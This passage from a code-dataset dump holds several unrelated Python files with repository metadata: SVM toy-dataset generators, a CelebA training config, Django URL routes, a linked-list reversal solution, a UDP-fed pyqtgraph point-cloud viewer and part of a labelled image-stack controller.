print(data)\n    plt.figure(figsize=(5, 5))\n    plt.scatter(x=data[data['Color'] == 'red'].iloc[:, 0], y=data[data['Color'] == 'red'].iloc[:, 1], s=5, c='red')\n    plt.scatter(x=data[data['Color'] == 'green'].iloc[:, 0], y=data[data['Color'] == 'green'].iloc[:, 1], s=5,\n                c='blue')\n    plt.savefig('./output/dataset-NormalDiagonal.png')\n    plt.show()\n\n    return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef test_data_b():\n    data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_b.txt', sep='\\t')\n    data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_b_test.txt', sep='\\t')\n    data = pd.concat([data_train, data_test], axis=0)\n    data = shuffle(data).reset_index(drop=True)\n    return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef sawtooth():\n    data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_d.txt', sep='\\t')\n    data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_d_test.txt', sep='\\t')\n    data = pd.concat([data_train, data_test], axis=0)\n    print(data.shape)\n    # data = shuffle(data).reset_index(drop=True)\n\n    plt.figure(figsize=(5, 5))\n    plt.scatter(x=data[data['Colors'] == 'red'].iloc[:, 0], y=data[data['Colors'] == 'red'].iloc[:, 1], s=18, c='red')\n    plt.scatter(x=data[data['Colors'] == 'green'].iloc[:, 0], y=data[data['Colors'] == 'green'].iloc[:, 1], s=18, c='blue')\n    plt.savefig('./output/dataset-Sawtooth.png')\n    plt.show()\n\n    # return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n    return data_train.iloc[:, :-1], data_test.iloc[:, :-1], data_train.iloc[:, -1], data_test.iloc[:, -1]\n\n\ndef test_data_e():\n    data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_e.txt', sep='\\t')\n    data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_e_test.txt', sep='\\t')\n    data = pd.concat([data_train, data_test], axis=0)\n    # data = shuffle(data).reset_index(drop=True)\n    return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef fourclass():\n    data = 
pd.read_csv(filepath_or_buffer='./test_data/fourclass.csv')\n    data = data.dropna(axis=0)\n    data_1 = data[data['target'] == -1.0]\n    data_2 = data[data['target'] == 1.0]\n    plt.figure(figsize=(5, 5))\n    plt.scatter(x=data_1.iloc[:, 0], y=data_1.iloc[:, 1], s=5, c='blue')\n    plt.scatter(x=data_2.iloc[:, 0], y=data_2.iloc[:, 1], s=5, c='red')\n    plt.savefig('./output/dataset-fourclass.png')\n    plt.show()\n\n    return train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\ndef dataset_nesting():\n    plt.figure(figsize=(5, 5))\n    tmp_x1 = np.random.uniform(low=0, high=10, size=500)\n    tmp_y1 = np.random.uniform(low=0, high=10, size=500)\n    tmp_t1 = np.full(shape=(500,), fill_value='red')\n    data_1 = pd.concat([pd.Series(tmp_x1), pd.Series(tmp_y1), pd.Series(tmp_t1)], axis=1)\n    data_1.columns = ('x', 'y', 'target')\n    data_1 = data_1.drop(data_1.query('x > 3 & x < 7 & y > 2 & y < 8').index, axis=0)\n    plt.scatter(data_1['x'], data_1['y'], s=5, c='red')\n\n    tmp_x2 = np.random.uniform(low=3, high=7, size=200)\n    tmp_y2 = np.random.uniform(low=2, high=8, size=200)\n    tmp_t2 = np.full(shape=(200,), fill_value='blue')\n    data_2 = pd.concat([pd.Series(tmp_x2), pd.Series(tmp_y2), pd.Series(tmp_t2)], axis=1)\n    data_2.columns = ('x', 'y', 'target')\n    plt.scatter(data_2['x'], data_2['y'], s=5, c='blue')\n    plt.show()\n\n    data = pd.concat([data_1, data_2], axis=0)\n    # data = shuffle(data).reset_index(drop=True)\n    return train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n\ndef checkerboard():\n    num_every_board = 200 # Number of points in each board square\n\n    data_red_1 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=0, high=2.5, size=num_every_board))], axis=1)\n\n    data_red_2 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n    data_red_3 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n    data_red_4 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n    data_red_5 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n    data_red_6 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n    data_red_7 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n\n    data_red_8 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n                            pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n    data_red = pd.concat([data_red_1, data_red_2, data_red_3, data_red_4,\n                          data_red_5, data_red_6, data_red_7, data_red_8], axis=0)\n    target_red = pd.Series(np.full(shape=(8 * num_every_board,), fill_value=0))\n\n    data_red = data_red.reset_index(drop=True)\n    data_red = pd.concat([data_red, target_red], axis=1)\n    data_red.columns = ('x', 'y', 'target')\n\n    data_blue_1 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n    data_blue_2 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n    data_blue_3 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n    data_blue_4 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n    data_blue_5 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n    data_blue_6 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n    data_blue_7 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n\n    data_blue_8 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n                             pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n    data_blue = pd.concat([data_blue_1, data_blue_2, data_blue_3, data_blue_4,\n                           data_blue_5, data_blue_6, data_blue_7, data_blue_8], axis=0)\n    target_blue = pd.Series(np.full(shape=(8 * num_every_board,), fill_value=1))\n\n    data_blue = data_blue.reset_index(drop=True)\n    data_blue = pd.concat([data_blue, target_blue], axis=1)\n    data_blue.columns = ('x', 'y', 'target')\n\n    data = pd.concat([data_red, data_blue], axis=0)\n    # data = shuffle(data).reset_index(drop=True)\n    nn, x_test, nnn, y_test = train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n    num_noise = 300 # Number of noise points\n    noise_red = pd.concat([pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n                           pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n                           pd.Series(np.full(shape=(num_noise,), fill_value=0))], axis=1)\n    noise_red.columns = ('x', 'y', 'target')\n    noise_blue = pd.concat([pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n                            pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n                            pd.Series(np.full(shape=(num_noise,), fill_value=1))], axis=1)\n    noise_blue.columns = ('x', 'y', 'target')\n    noise = pd.concat([noise_red, noise_blue], axis=0)\n    data = pd.concat([data, noise], axis=0) # Add the noise\n\n    plt.figure(figsize=(5, 5))\n    plt.scatter(data_red['x'], data_red['y'], s=5, c='red')\n    plt.scatter(data_blue['x'], data_blue['y'], s=5, c='blue')\n    plt.scatter(noise_red['x'], noise_red['y'], s=5, c='red', marker='o')\n    plt.scatter(noise_blue['x'], noise_blue['y'], s=5, c='blue', marker='o')\n    plt.savefig('./output/dataset-checkerboard.png')\n    plt.show()\n\n    x_train, nn, y_train, nnn = train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n    return x_train, x_test, y_train, y_test\n\n\ndef double_helix():\n    N = 400\n    theta = np.sqrt(np.random.rand(N)) * 2 * pi # np.linspace(0,2*pi,100)\n\n    r_a = 2 * theta + pi\n    data_a = np.array([np.cos(theta) * r_a, np.sin(theta) * r_a]).T\n    x_a = data_a + np.random.randn(N, 2)\n\n    r_b = -2 * theta - pi\n    data_b = np.array([np.cos(theta) * r_b, np.sin(theta) * r_b]).T\n    x_b = data_b + np.random.randn(N, 2)\n\n    res_a = np.append(x_a, np.zeros((N, 1)), axis=1) # With feature values and target values\n    res_b = np.append(x_b, np.ones((N, 1)), axis=1)\n\n    data = 
np.append(res_a, res_b, axis=0)\n print(data.shape)\n\n plt.figure(figsize=(5, 5))\n plt.scatter(x_a[:, 0], x_a[:, 1], s=5, c='red')\n plt.scatter(x_b[:, 0], x_b[:, 1], s=5, c='blue')\n plt.savefig('./output/dataset-DoubleHelix.png')\n plt.show()\n return train_test_split(data[:, :-1], data[:, -1], random_state=RANDOM_STATE)\n","repo_name":"NekoSilverFox/CUC","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"73047102667","text":"# IMPORT\nimport os\n\n# Define the file path\nDATASET_PATH = '../celeba_dataset'\nATTR_PATH = os.path.sep.join([DATASET_PATH, 'list_attr_celeba.csv'])\nBBOX_PATH = os.path.sep.join([DATASET_PATH, 'list_bbox_celeba.csv'])\nPART_PATH = os.path.sep.join([DATASET_PATH, 'list_eval_partition.csv'])\nLAND_PATH = os.path.sep.join([DATASET_PATH, 'list_landmarks_align_celeba.csv'])\nALIGN_IMAGES_PATH = os.path.sep.join([DATASET_PATH, 'img_align_celeba/img_align_celeba/'])\nWILD_IMAGES_PATH = os.path.sep.join([DATASET_PATH, 'in_the_wild_celeba/in_the_wild_celeba/'])\n\n# Define the output directory\nBASE_OUTPUT = \"output\"\nBBOX_MODEL_PATH = os.path.sep.join([BASE_OUTPUT, 'bbox_model.h5'])\nLANDMARK_MOEL_PATH = os.path.sep.join([BASE_OUTPUT, 'landmark_model.h5'])\nATTR_MODEL_PATH = os.path.sep.join([BASE_OUTPUT, 'attr_model.h5'])\nPLOT_PATH = os.path.sep.join([BASE_OUTPUT, 'plot.png'])\n\n# Define the prepared directory\nREADY_DATA = \"ready_data\" \nTRAIN_FILENAMES = os.path.sep.join([READY_DATA, 'train_img_filenameList.txt'])\nVALID_FILENAMES = os.path.sep.join([READY_DATA, 'valid_img_filenameList.txt'])\nTEST_FILENAMES = os.path.sep.join([READY_DATA, 'test_img_filenameList.txt'])\nTRAIN_BBOX = os.path.sep.join([READY_DATA, 'train_img_bbox.txt'])\nVALID_BBOX = os.path.sep.join([READY_DATA, 'valid_img_bbox.txt'])\nTEST_BBOX = os.path.sep.join([READY_DATA, 'test_img_bbox.txt'])\nTRAIN_LANDMARK = os.path.sep.join([READY_DATA, 'train_img_landmark.txt'])\nVALID_LANDMARK = os.path.sep.join([READY_DATA, 'valid_img_landmark.txt'])\nTEST_LANDMARK = os.path.sep.join([READY_DATA, 'test_img_landmark.txt'])\nTRAIN_ATTR = os.path.sep.join([READY_DATA, 'train_img_attr.txt'])\nVALID_ATTR = os.path.sep.join([READY_DATA, 'valid_img_attr.txt'])\nTEST_ATTR = os.path.sep.join([READY_DATA, 'test_img_attr.txt'])\nATTR_LIST = os.path.sep.join([READY_DATA, 'attr_list.txt'])\n\n# Define original image dimension\nIMG_WIDTH = 178.0\nIMG_HEIGHT = 218.0\n\n# Define traing and predicting target_image_dimension\nTAR_IMG_WIDTH = 224\nTAR_IMG_HEIGHT = 224\n\n# Define deep learning hyperparameters\nINIT_LR = 0.00001\nNUM_EPOCHS = 100\nBATCH_SIZE = 32\n\n# Supress the tensorflow warning messages\n# by adjusting the verbosity by changing the value of TF_CPP_MIN_LOG_LEVEL:\n# 0 = all message are logged (default behavior)\n# 1 = INFO messages are not printed\n# 2 = INFO and WARNING messages are not printed\n# 3 = INFO, WARNING, and ERROR messages are not printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# Print iterations progress\ndef progressBar(iterable, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @Author of this Function: Greenstick from stackoverflow\n @URL: https://stackoverflow.com/a/34325723\n @params:\n iterable - Required : iterable object (Iterable)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - 
Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n total = len(iterable)\n # Progress Bar Printing Function\n def printProgressBar (iteration):\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\n # Initial Call\n printProgressBar(0)\n # Update Progress Bar\n for i, item in enumerate(iterable):\n yield item\n printProgressBar(i + 1)\n # Print New Line on Complete\n print()","repo_name":"yang242j/Facial-Attributes-Detection","sub_path":"Project/code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71529866509","text":"from django.conf.urls import include, url, patterns\nfrom product import views\n\nurlpatterns = patterns('',\n\n #\n # Product Views\n #\n\n url(regex=r'^$',\n view = views.ProductSearchableListView.as_view(),\n name = 'product_list',\n ),\n url(regex = r'^add/$',\n view = views.ProductCreateView.as_view(),\n name = 'product_add',\n ),\n url(regex = r'^(?P\\d+)/$',\n view = views.ProductUpdateView.as_view(),\n name = 'product_edit',\n ),\n url(regex = r'^(?P\\d+)/delete/$',\n view = views.ProductDeleteView.as_view(),\n name = 'product_delete',\n ),\n\n #\n # Brand Views\n #\n url(regex=r'^brand/$',\n view = views.BrandSearchableListView.as_view(),\n name = 'brand_list',\n ),\n\n url(regex=r'^brand/add/$',\n view = views.BrandCreateView.as_view(),\n name = 'brand_add',\n ),\n\n url(regex=r'^brand/(?P\\d+)/$',\n view = views.BrandUpdateView.as_view(),\n name = 'brand_edit',\n ),\n\n #\n # Model Views\n #\n\n url(regex=r'^model/$',\n view = views.ModelSearchableListView.as_view(),\n name = 'model_list',\n ),\n\n url(regex=r'^model/add/$',\n view = views.ModelCreateView.as_view(),\n name = 'model_add',\n ),\n\n url(regex=r'^model/(?P\\d+)/$',\n view = views.ModelUpdateView.as_view(),\n name = 'model_edit',\n ),\n\n\n\n\n)\n","repo_name":"edgabaldi/tcc","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"74236788107","text":"class Solution:\n \n def helper(self, head, n):\n \"\"\"reverses the first n elements of the list\"\"\"\n new_list = None\n orig_head = head\n for _ in range(n):\n temp = head\n head = head.next\n temp.next = new_list\n new_list = temp\n orig_head.next = head\n return new_list\n \n \n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n dummy = ListNode(next=head)\n curr = dummy\n for _ in range(left - 1):\n curr = curr.next\n curr.next = self.helper(curr.next, right - left + 1)\n return dummy.next","repo_name":"AubynKen/LeetCode","sub_path":"0094. (Medium) Reverse Linked List II.py","file_name":"0094. 
(Medium) Reverse Linked List II.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30999745111","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport numpy as np\nimport socket\nimport threading\n\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nclass Visualizer(object):\n def __init__(self):\n self.point_size = 3.0\n self.traces = dict()\n self.app = QtGui.QApplication(sys.argv)\n self.w = gl.GLViewWidget()\n self.w.opts['distance'] = 40\n self.w.setWindowTitle('Visualizer')\n self.w.setGeometry(0, 110, 1920, 1080)\n self.w.show()\n\n # create the background grids\n gx = gl.GLGridItem()\n gx.rotate(90, 0, 1, 0)\n gx.translate(-10, 0, 10)\n self.w.addItem(gx)\n gy = gl.GLGridItem()\n gy.rotate(90, 1, 0, 0)\n gy.translate(0, -10, 10)\n self.w.addItem(gy)\n gz = gl.GLGridItem()\n gz.translate(0, 0, 0)\n self.w.addItem(gz)\n\n pts = np.array([[0,0,0]])\n self.traces[0] = gl.GLScatterPlotItem(pos=pts, color=(1.,1.,1.,0.), size=self.point_size)\n self.w.addItem(self.traces[0])\n \n self.points = pts\n \n self.PORT = 6666\n self.stop_read_event = threading.Event()\n \n self.read_cyclic = threading.Thread(\n target=self.read_data, args=()\n )\n \n def start(self):\n self.soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.soc.bind(('', self.PORT))\n self.stop_read_event.clear()\n self.read_cyclic.start()\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n \n def close(self):\n self.stop_read_event.set()\n if self.soc is not None:\n self.soc.close()\n QtGui.QApplication.instance().quit()\n\n def read_data(self):\n while not self.stop_read_event.is_set():\n data = self.soc.recv(65535)\n self.points = np.frombuffer(data,dtype=\"float32\").reshape(int(len(data)/12), 3)\n \n def set_plotdata(self, points, color):\n self.traces[0].setData(pos=points, color=color, size=self.point_size)\n\n def update(self):\n #self.points = global_pc.T\n self.set_plotdata(\n points=self.points,\n color=(0.,1.,1.,1.)\n )\n\n def animation(self):\n timer = QtCore.QTimer()\n timer.timeout.connect(self.update)\n timer.start(16)\n self.start()\n \n def get_color(self, pts):\n z_max = np.max(pts, axis=0)[2]\n z_min = np.min(pts, axis=0)[2]\n z_avg = np.mean(pts, axis=0)[2]\n delta = min(z_max - z_avg, z_avg - z_min)\n z_max = z_avg + delta\n z_min = z_avg - delta\n \n colors = np.ones((pts.shape[0], 4))\n for i in range(len(pts)):\n color = (pts[i][2] - z_min)/(z_max - z_min)\n color = max(0, min(color, 1))\n colors[i][0] = 2*color-1 if color > 0.5 else 0\n colors[i][1] = 2 - 2*color if color > 0.5 else 2*color\n colors[i][2] = 0 if color > 0.5 else 1 - 2*color\n return colors\n \nif __name__ == '__main__':\n v = Visualizer()\n v.animation()\n v.close()","repo_name":"ZJU-Robotics-Lab/CICT","sub_path":"scripts/generate_data/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"82"} +{"seq_id":"20272226772","text":"from __future__ import print_function\nfrom log_tool import *\n# import labelled stack\n\n#from ev_split import ev_split\n\nfrom labelled_stack import LabelledStack\n#from projection_mesh import ProjectionMesh\n\n#from gen_mesh import make_iso_open_z as make_iso\n#from gen_mesh import make_iso_manifold_smooth\n#from gen_mesh import make_iso_manifold\n#from gen_mesh import 
make_iso_labels\n\n\nimport numpy as np\nimport scipy.ndimage as nd\nimport itertools\n\nfrom skimage.segmentation import random_walker\nfrom skimage.draw import line\nimport skimage.exposure\nimport skimage.measure\n\nfrom image_io.import_tiff import *\nfrom image_io.import_image_dir import *\nfrom image_io.import_png import *\n\nfrom utils_new import *\nfrom utils_itk import *\n\nimport scipy.linalg as la\n\nimport SimpleITK as sitk\n\nimport eval_seg\n#import objgraph\n\n#from viewer.libintersect import stack_from_mesh\n\n#from track_allocations import AllocationTracker\n\n#import psutil\nimport os\n\nimport csv\nimport blosc\nimport copy\n\n\nimport collections\n\ndef undo_no_log(f):\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self = args[0]\n self.log.write('[\"{}\",{},{}]'.format(f.__name__,args[1:],kwargs)+'\\n')\n self.log.flush()\n v = f(*args, **kwargs)\n def u():\n f(*args, **kwargs)\n def undo():\n pass\n return v\n return func_wrapper\n\n\ndef undo_signal(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n # also need to preserve cell data ....\n\n old_signal = self.get_signal_controller().get_stack()\n def undo():\n self.get_label_controller().set_stack(old_signal)\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\"\"\"\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\"\"\"\n\ndef undo_selected(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\ndef undo_label(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n # also need to preserve cell data ....\n\n old_state = self.get_label_controller().get_state()\n def undo():\n self.get_label_controller().set_state(old_state)\n\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\n\ndef downsample_max(ma, k):\n return ma.reshape(ma.shape[0]//k, k, ma.shape[1]//k, k, ma.shape[2]//k, k).max(axis=(1,3,5))\n\n\ndef downsample(ma, k):\n return ma.reshape(ma.shape[0]//k, k, ma.shape[1]//k, k, ma.shape[2]//k, k).sum(axis=(1,3,5))/k/k/k\n\ndef upsample(ma, k):\n return nd.zoom(ma, k, order=1)\n\n\n\nclass Obj(object):\n pass\n\n\ndef apply_clip_planes(clip_planes, stack):\n x, y, z = np.ogrid[0:stack.shape[0], 0:stack.shape[1], 0:stack.shape[2]]\n transform = np.diag([stack.shape[2]-1, stack.shape[1]-1, stack.shape[0]-1, 1])\n norm_transform = (la.inv(transform)[:3,:3]).T\n for p, n in clip_planes:\n p = np.dot(transform, np.hstack((p,[1])))\n n = np.dot(norm_transform, n)\n print(stack.shape, x.shape, y.shape, z.shape)\n for i in range(0, stack.shape[0], 16):\n r = slice(i, min(i+16, stack.shape[0]))\n stack[r, :, :][((x[r,:,:]-p[2])*n[2]+(y-p[1])*n[1]+(z-p[0])*n[0])>0] = 0\n return stack\n\n\n\ndef make_label_obj(so, sso):\n o = Obj() \n o.so = so\n o.sso = sso\n\n tl = np.array((so.shape[2]*so.spacing[0],\n so.shape[1]*so.spacing[1],\n so.shape[0]*so.spacing[2]))\n \n\n dx = 0.0# 0.5/so.tex_shape[2] \n dy = 0.0# 0.5/so.tex_shape[1] \n dz = 0.0# 0.5/so.tex_shape[0] \n\n vb = [ [ 0.0, 0.0, 0.0, 0.0+dx, 0.0+dy, 0.0+dz],\n [ tl[0], 0.0, 0.0, 1.0-dx, 0.0+dy, 0.0+dz],\n [ 0.0, tl[1], 0.0, 0.0+dx, 1.0-dy, 0.0+dz],\n [ tl[0], tl[1], 0.0, 1.0-dx, 1.0-dy, 0.0+dz],\n [ 0.0, 0.0, tl[2], 0.0+dx, 0.0+dy, 1.0-dz],\n [ tl[0], 0.0, tl[2], 
1.0-dx, 0.0+dy, 1.0-dz],\n [ 0.0, tl[1], tl[2], 0.0+dx, 1.0-dy, 1.0-dz],\n [ tl[0], tl[1], tl[2], 1.0-dx, 1.0-dy, 1.0-dz] ]\n\n\n vb = np.array(vb, dtype=np.float32)\n vb = vb.flatten()\n \n idx_out = np.array([[0, 2, 1], [2, 3, 1],\n [1, 4, 0], [1, 5, 4],\n [3, 5, 1], [3, 7, 5],\n [2, 7, 3], [2, 6, 7],\n [0, 6, 2], [0, 4, 6],\n [5, 6, 4], [5, 7, 6]]\n , dtype=np.uint32) \n\n \n sc = 1.0/la.norm(tl)\n c = 0.5*tl\n\n\n o.transform = np.array(( (sc, 0.0, 0.0, -sc*c[0]), (0.0, sc, 0.0, -sc*c[1]), (0.0, 0.0, sc, -sc*c[2]), (0.0, 0.0, 0.0, 1.0)))\n\n o.tex_transform = np.array( (((1.0-2*dx)/tl[0], 0.0, 0.0, dx), \n ( 0.0, (1.0-2*dy)/tl[1], 0.0, dy),\n ( 0.0, 0.0, (1.0-2*dz)/tl[2], dz),\n ( 0.0, 0.0, 0.0, 1.0) ))\n\n o.orig_vb = np.array(vb)\n o.orig_idx = idx_out\n \n return o\n\ndef make_stack_label_obj(stack, spacing):\n o = Obj()\n o.shape = stack.shape\n o.spacing = spacing\n return o\n\ndef make_stack_obj(stacks, spacing):\n o = Obj()\n o.shape = stacks[0].shape\n o.spacing = spacing\n return o\n\n\n\nclass StackController(object):\n def __init__(self, stack, spacing):\n self.stack = stack\n self.spacing = spacing\n self.update_callbacks = []\n\n \n def apply_clip_planes(self, clip_planes):\n self.set_stack(apply_clip_planes(clip_planes, self.stack))\n\n def set_stack(self, s):\n self.stack = s\n \n def update(self, msg=None):\n for f in self.update_callbacks:\n f(msg)\n\n\n\nclass LabelledStackController(StackController):\n def __init__(self, stack, spacing, img_data=None, orig_shape=None, autosave_dir=None):\n self.labelled_stack = LabelledStack(stack, spacing, img_data)\n self.spacing = spacing\n self.selected = []\n self.update_callbacks = []\n self.omitted = []\n self.stack_updated = False\n if orig_shape is not None:\n self.orig_shape = orig_shape\n else:\n self.orig_shape = stack.shape\n self.autosave_dir = autosave_dir\n self.autosave_idx = 0\n\n\n\n def get_state(self):\n return blosc.pack_array(self.labelled_stack.labels, cname='lz4'), copy.deepcopy((self.labelled_stack.celltypes, self.labelled_stack.cell_props, self.selected, self.omitted, self.spacing, self.orig_shape))\n\n def set_state(self, state):\n (self.labelled_stack.labels, self.labelled_stack.celltypes, self.labelled_stack.cell_props, self.selected, self.omitted, self.spacing, self.orig_shape) = (blosc.unpack_array(state[0]),) + state[1]\n self.update_cells()\n self.update()\n\n \n \n def update(self, msg=None):\n StackController.update(self, msg)\n print('as', self.autosave_dir)\n if self.autosave_dir and msg!='selected':\n self.write_celltypes(self.autosave_dir + '/'+str(self.autosave_idx)+'.csv')\n self.write_tiff(self.autosave_dir + '/'+str(self.autosave_idx)+'.tif')\n self.autosave_idx = (self.autosave_idx+1)%10\n \n def update_cells(self):\n self.labelled_stack.update_cells()\n # save_cell_props\n\n def add_seed(self, v, r=1, use_selected=False):\n print(v)\n s = self.stack\n shape = s.shape\n if not use_selected or not self.selected:\n new_idx = np.max(self.stack)+ 1\n else:\n new_idx = self.selected[0]\n print('new_idx', new_idx)\n s[min(shape[0]-1,max(0,v[0]-r)):min(shape[0],v[0]+r+1),\n min(shape[1]-1,max(0,v[1]-r)):min(shape[1],v[1]+r+1),\n min(shape[2]-1,max(0,v[2]-r)):min(shape[2],v[2]+r+1)] = new_idx\n# print (min(shape[0],max(0,v[0]-r)), min(shape[0],v[0]+r+1))\n self.labelled_stack.celltypes[new_idx] = 0\n for p in self.labelled_stack.cell_props.values():\n p[new_idx] = 0\n self.update_cells()\n self.update()\n\n def classify_seg(self, other_labels):\n celltypes = self.labelled_stack.celltypes\n A = 
self.stack\n        matching_cells, best_IoU = eval_seg.matching_IoU(A, other_labels, threshold=0.75, return_best=True)\n        under_seg, acme = eval_seg.calc_acme_criterion(A, other_labels, threshold=0.5, return_criterion=True)\n        under_seg = set(under_seg) - set(matching_cells)\n\n        l = np.unique(A)\n        print(best_IoU)\n        for i in l:\n            if i in matching_cells:\n                celltypes[i] = 0\n            elif i in under_seg:\n                celltypes[i] = 1\n            else:\n                celltypes[i] = 2\n        print(celltypes)\n        self.update()\n\n    def split_cc(self):\n        new = skimage.measure.label(self.stack)\n        self.labelled_stack.set_stack(new)\n        self.labelled_stack.celltypes = {} #dict((i, 0) for i in np.unique(new))\n        self.update_cells()\n        self.update()\n    \n    def update_signal(self, stack):\n        self.labelled_stack.update_img_data(stack)\n    \n    def write_tiff(self, fn):\n        s = self.orig_shape\n        write_tiff(fn, self.stack[:s[0], :s[1], :s[2]].astype(np.uint16), self.spacing)\n\n    def set_omitted(self, omitted):\n        self.omitted = omitted\n    \n    def update_selected(self):\n        self.update('selected')\n\n    def get_selected(self):\n        return list(self.selected)\n\n    def get_label_point(self, p):\n        if self.stack.shape[0]>1:\n            return self.stack[tuple(p)]\n        else:\n            return self.stack[(0,)+tuple(p[1:])]\n    \n    def gen_colmap(self, prop_name=None, celltypes=False, omitted=[], ct_weight=0.6, grey_labels=False):\n        return self.labelled_stack.gen_colmap(prop_name, celltypes, 